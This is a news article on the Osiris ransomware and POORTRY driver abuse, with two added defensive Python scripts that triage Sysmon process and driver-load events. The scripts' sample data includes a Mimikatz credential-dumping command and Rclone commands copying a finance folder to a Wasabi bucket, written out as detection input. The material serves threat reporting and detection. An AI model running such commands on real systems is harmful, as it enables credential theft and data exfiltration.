Fyself News
New Osiris ransomware emerges as a new variant that uses POORTRY drivers in BYOVD attacks

January 22, 2026

Cybersecurity researchers have revealed details of a new ransomware family called Osiris that targeted major food service franchise operators in Southeast Asia in November 2025.

According to Symantec and the Carbon Black Threat Hunter Team, the attack used a malicious driver called POORTRY as part of a technique known as BYOVD (Bring Your Own Vulnerable Driver) to disable security software.

It is worth noting that Osiris is assessed to be an entirely new ransomware strain and bears no resemblance to another variant of the same name that emerged in December 2016 as an iteration of Locky ransomware. At this time, it is unclear who the developer of this locker is and whether it is being advertised as ransomware-as-a-service (RaaS).

However, Broadcom’s cybersecurity division said it has identified clues that suggest the attackers who deployed the ransomware may have been previously involved with INC ransomware, also known as Warble.

“This attack used a wide range of living-off-the-land and dual-use tools, including the malicious POORTRY driver, which may have been used as part of a bring-your-own-vulnerable-driver (BYOVD) attack to disable security software,” the company said in a report shared with The Hacker News.

“The exfiltration of data to a Wasabi bucket by the attackers, and the use of a version of Mimikatz with the same filename (kaz.exe) previously used by the attackers deploying INC ransomware, indicate a potential link between this attack and some attacks involving INC.”

Osiris has been described as an “effective cryptographic payload” that is likely to be used by experienced attackers; it uses a hybrid encryption scheme with a unique encryption key for each file. It is also configurable: the operator can stop services, specify which folders and file extensions to encrypt, terminate processes, drop ransom notes, and more.


By default, it is designed to kill a long list of processes and services related to Microsoft Office, Exchange, Mozilla Firefox, WordPad, Notepad, Volume Shadow Copy, Veeam, and more.

The first signs of malicious activity on the target’s network were the exfiltration of sensitive data with Rclone to a Wasabi cloud storage bucket, before the ransomware was deployed. The attack also used a number of dual-use tools, including Netscan, NetExec, and MeshAgent, as well as a custom build of the RustDesk remote desktop software.
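As an added example (not code from the Symantec/Carbon Black report or from any tool it describes), the following Python script triages Sysmon process-creation events (Event ID 1) for the two patterns in the paragraph above: dual-use binaries renamed on disk, caught through the PE OriginalFileName field that survives a rename such as kaz.exe, and Rclone transfers to a cloud remote. The Sysmon event lines are constructed for the demo; the endpoint strings (the Wasabi S3 hostname plus a few other providers), the remote-name regex and the tool map are assumptions to tune for your own environment.

```python
import re
from dataclasses import dataclass

# Dual-use tools named in the article, keyed by the PE OriginalFileName that
# Sysmon records. The field comes from the binary's version resource, so a
# Mimikatz copy renamed to kaz.exe on disk still reports mimikatz.exe.
# Extend this map with the OriginalFileName values of the tools you care about.
DUAL_USE_ORIGINAL_NAMES = {
    "mimikatz.exe": "credential dumping",
    "rclone.exe": "cloud sync / possible exfiltration",
}

# Rclone subcommands that move data to a remote.
RCLONE_TRANSFER_CMDS = {"copy", "sync", "move", "copyto", "moveto"}

# Cloud storage endpoint substrings to flag on a command line. Assumption:
# Wasabi is the service named in the article; the others are common
# alternatives. Adjust for the providers your organisation actually uses.
CLOUD_ENDPOINTS = ("wasabisys.com", "amazonaws.com", "backblazeb2.com", "mega.nz")

# An rclone remote is written "name:path". Requiring at least two characters
# before the colon keeps Windows drive letters such as C:\ from matching.
REMOTE_ARG = re.compile(r"^[A-Za-z0-9_-]{2,}:")


@dataclass
class Finding:
    image: str
    reasons: list


def parse_event(line):
    """Parse a flattened 'Key=Value|Key=Value' Sysmon record (demo format;
    a real pipeline would read the XML or JSON the collector emits)."""
    return dict(kv.split("=", 1) for kv in line.strip().split("|"))


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def assess(event):
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    orig = event.get("OriginalFileName", "").lower()
    on_disk = basename(image)
    reasons = []

    if orig in DUAL_USE_ORIGINAL_NAMES:
        reasons.append(DUAL_USE_ORIGINAL_NAMES[orig])
        if orig != on_disk:
            reasons.append(f"renamed: on disk as {on_disk}, originally {orig}")

    if "rclone.exe" in (orig, on_disk):
        args = cmd.split()
        if len(args) > 2 and args[1].lower() in RCLONE_TRANSFER_CMDS \
                and any(REMOTE_ARG.match(a) for a in args[2:]):
            reasons.append("rclone transfer to remote")

    if any(ep in cmd.lower() for ep in CLOUD_ENDPOINTS):
        reasons.append("cloud storage endpoint on command line")

    return Finding(image, reasons) if reasons else None


def triage(lines):
    """Return a Finding for every Event ID 1 record that trips a heuristic."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        event = parse_event(line)
        if event.get("EventID") == "1":
            finding = assess(event)
            if finding:
                findings.append(finding)
    return findings


# Constructed sample events, not taken from the incident.
SAMPLE_EVENTS = r"""
EventID=1|Image=C:\Windows\System32\svchost.exe|CommandLine=svchost.exe -k netsvcs|OriginalFileName=svchost.exe
EventID=1|Image=C:\Users\Public\kaz.exe|CommandLine=kaz.exe "privilege::debug" "sekurlsa::logonpasswords"|OriginalFileName=mimikatz.exe
EventID=1|Image=C:\ProgramData\rc.exe|CommandLine=rc.exe copy D:\Finance wb:corp-backup --transfers 16 --config C:\ProgramData\r.conf|OriginalFileName=rclone.exe
EventID=1|Image=C:\Tools\rclone.exe|CommandLine=rclone.exe config create wb s3 provider Wasabi endpoint s3.wasabisys.com|OriginalFileName=rclone.exe
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS.splitlines()):
        print(f.image)
        for r in f.reasons:
            print("   -", r)
```

The OriginalFileName check is the one worth keeping even if the rest is replaced by a SIEM rule: it is cheap, and it is exactly how a renamed kaz.exe gives itself away. The command-line heuristics are deliberately loose (a remote named with a single character, or an Rclone config kept in a file rather than on the command line, slips past them), so treat the reasons as a score that prompts a look at the parent process and the user, not as a verdict.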

The use of POORTRY differs slightly from a traditional BYOVD attack in that, rather than bringing a legitimate but vulnerable driver onto the target network, the attacker loads a custom-built driver designed specifically to escalate privileges and terminate security tools.

“KillAV, a tool that deploys vulnerable drivers that terminate security processes, was also deployed on the targeted networks,” the Symantec and Carbon Black threat hunter team said. “RDP was also enabled on the network, which may have provided the attacker with remote access.”
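One check a defender would want at this point, as an added example rather than code from the report: triage Sysmon DriverLoad events (Event ID 6) for the BYOVD pattern. Known-abused driver names are matched, but because a custom-built driver like POORTRY can carry a valid-looking signature under a name no list knows, the script also flags drivers that are unsigned, whose signature state is anything other than valid, or that load from outside the standard driver directories. The driver names are the ones this page reports (ThrottleStop.sys, hlpdrv.sys, rsndispot.sys and kl.sys from the Akira, Makop and Storm-2603 cases); the hash blocklist entry, the signer names and the event lines are constructed for the demo.

```python
import re
from dataclasses import dataclass

# Driver file names this page reports as abused in BYOVD attacks.
KNOWN_ABUSED_DRIVERS = {
    "throttlestop.sys",  # Akira, Makop
    "hlpdrv.sys",        # Makop
    "rsndispot.sys",     # Storm-2603
    "kl.sys",            # Storm-2603
}

# Placeholder hash blocklist (constructed value). In production, load the
# Microsoft recommended driver block rules or a community list such as
# loldrivers.io instead of hard-coding hashes here.
BLOCKED_SHA256 = {
    "1111111111111111111111111111111111111111111111111111111111111111",
}

# Directories from which properly installed drivers are loaded.
TRUSTED_DRIVER_DIRS = (
    "c:\\windows\\system32\\drivers\\",
    "c:\\windows\\system32\\driverstore\\",
)


@dataclass
class Finding:
    image: str
    reasons: list


def parse_event(line):
    """Parse a flattened 'Key=Value|Key=Value' Sysmon record (demo format)."""
    return dict(kv.split("=", 1) for kv in line.strip().split("|"))


def sha256_of(hashes_field):
    """Sysmon writes 'SHA256=<hex>,MD5=<hex>,...'; pull out the SHA-256."""
    m = re.search(r"SHA256=([0-9a-fA-F]{64})", hashes_field)
    return m.group(1).lower() if m else ""


def assess(event):
    image = event.get("ImageLoaded", "")
    name = image.rsplit("\\", 1)[-1].lower()
    status = event.get("SignatureStatus", "").lower()
    reasons = []

    if name in KNOWN_ABUSED_DRIVERS:
        reasons.append("known-abused driver name")
    if sha256_of(event.get("Hashes", "")) in BLOCKED_SHA256:
        reasons.append("hash on blocklist")
    # A custom driver like POORTRY will not be on a name or hash list, so the
    # signature state and the load path are the remaining signals.
    if event.get("Signed", "").lower() != "true":
        reasons.append("unsigned")
    elif status != "valid":
        reasons.append(f"signature {status}")
    if not image.lower().startswith(TRUSTED_DRIVER_DIRS):
        reasons.append("loaded from non-standard path")

    return Finding(image, reasons) if reasons else None


def triage(lines):
    """Return a Finding for each Event ID 6 record that trips a heuristic."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        event = parse_event(line)
        if event.get("EventID") == "6":
            finding = assess(event)
            if finding:
                findings.append(finding)
    return findings


# Constructed sample events, not taken from the incident.
SAMPLE_EVENTS = r"""
EventID=6|ImageLoaded=C:\Windows\System32\drivers\tcpip.sys|Hashes=SHA256=2222222222222222222222222222222222222222222222222222222222222222|Signed=true|Signature=Microsoft Windows|SignatureStatus=Valid
EventID=6|ImageLoaded=C:\Users\Public\ThrottleStop.sys|Hashes=SHA256=3333333333333333333333333333333333333333333333333333333333333333|Signed=true|Signature=Example Publisher|SignatureStatus=Valid
EventID=6|ImageLoaded=C:\ProgramData\kl.sys|Hashes=SHA256=1111111111111111111111111111111111111111111111111111111111111111|Signed=true|Signature=Example Signer|SignatureStatus=Revoked
EventID=6|ImageLoaded=C:\Windows\Temp\x.sys|Hashes=SHA256=4444444444444444444444444444444444444444444444444444444444444444|Signed=false|Signature=|SignatureStatus=Unavailable
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS.splitlines()):
        print(f.image, "->", "; ".join(f.reasons))
```

The second sample line is the classic BYOVD case: a validly signed, genuinely legitimate driver that has no business loading from a user-writable directory, which is why the path check matters as much as the name list. Note that the path check on its own is noisy (some third-party installers legitimately load drivers from their own directories), so score the reasons together and pivot to the process that created the service (Sysmon Event ID 1 for sc.exe or a service-control API call) before acting. Turning on the Microsoft vulnerable driver blocklist stops the listed drivers from loading at all, but it does not stop a freshly signed custom driver, which is the point of POORTRY.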

This development comes as ransomware remains a significant threat to businesses, and the landscape is constantly changing, with some groups closing their doors and others quickly rising from the ashes or stepping in to take their place. According to an analysis of data leak sites by Symantec and Carbon Black, ransomware attackers claimed a total of 4,737 attacks in 2025, an increase of 0.8% from 4,701 in 2024.

The most active players over the past year were Akira (aka Darter or Howling Scorpius), Qilin (aka Stinkbug or Water Galura), Play (aka Balloonfly), INC, SafePay, RansomHub (aka Greenbottle), DragonForce (aka Hackledorb), Sinobi, Rhysida, and CACTUS. Some of the other notable developments in this area include:

  • Attackers deploying Akira ransomware used the vulnerable ThrottleStop driver, and abused the Windows CardSpace user interface agent and the Microsoft Media Foundation Protected Pipeline to sideload the Bumblebee loader, in attacks observed in mid-to-late 2025. The Akira campaign also exploited SonicWall SSL VPN appliances to get into the environments of small and medium-sized businesses undergoing mergers and acquisitions, and ultimately gained access to the larger acquiring companies. Another Akira attack used a ClickFix-style CAPTCHA verification lure to drop a .NET remote access trojan called SectopRAT, which served as the conduit for remote control and ransomware delivery.
  • LockBit (also known as Syrphid), which partnered with DragonForce and Qilin in October 2025, continues to maintain its infrastructure despite the law enforcement operation that disrupted it in early 2024. Variants of LockBit 5.0 targeting multiple operating systems and virtualization platforms have also been released. A key change in LockBit 5.0 is a two-stage deployment model that separates the loader from the main payload to maximize evasion, modularity, and destructive impact.
  • A new RaaS operation called Sicarii has claimed only one victim since it first surfaced in late 2025. Although the group explicitly identifies itself as Israeli/Jewish, analysis reveals that its underground activity is conducted primarily in Russian and that the Hebrew content it shares contains grammatical and semantic errors, raising the possibility of a false flag operation. The main Sicarii operator uses the Telegram account “@Skibcum”.
  • The threat actor known as Storm-2603 (also tracked as CL-CRI-1040 or Gold Salem) has been observed leveraging the legitimate Velociraptor digital forensics and incident response (DFIR) tool as part of precursor activity leading to the deployment of Warlock, LockBit, and Babuk ransomware. The attacks also use two drivers (‘rsndispot.sys’ and ‘kl.sys’) and ‘vmtools.exe’ to disable security solutions via BYOVD.


  • Companies in India, Brazil, and Germany have been targeted by Makop ransomware attacks that exploit exposed, insecure RDP systems to stage tools for network scanning, privilege escalation, disabling security software, credential dumping, and ransomware deployment. The attacks use the ‘hlpdrv.sys’ and ‘ThrottleStop.sys’ drivers for BYOVD, and also deploy GuLoader to deliver the ransomware payload, the first documented case of Makop being distributed via a loader.
  • Lynx ransomware attacks have used previously compromised RDP credentials to gain initial access, performed reconnaissance, privilege escalation, and lateral movement over RDP, then exfiltrated data to temp[.]sh on day six of the breach and deployed the Lynx ransomware three days later.
  • A flaw in the encryption routine of Obscura ransomware renders large files unrecoverable. “When encrypting large files, the encrypted temporary key cannot be written to the footer of the file,” Coveware said. “For files larger than 1 GB, the footer is not created at all, meaning the key needed for decryption is lost. These files are permanently unrecoverable.”
  • A new ransomware family named 01flip is targeting a limited number of victims in the Asia-Pacific region. Written in Rust, it can target both Windows and Linux systems. The attack chain involves exploiting known security vulnerabilities (such as CVE-2019-11580) to gain a foothold on the target network. It is believed to be the work of a financially motivated threat actor tracked as CL-CRI-1036.

To protect against targeted attacks, organizations are encouraged to monitor the use of dual-use tools, restrict access to RDP services, enforce multi-factor authentication (MFA), use application allowlisting where applicable, and keep off-site copies of backups.

Symantec and Carbon Black said: “Ransomware cryptographic attacks remain prevalent and remain a threat, but the emergence of new types of non-cryptographic attacks further increases the risk and creates a broader extortion ecosystem, of which ransomware may be just one part.”
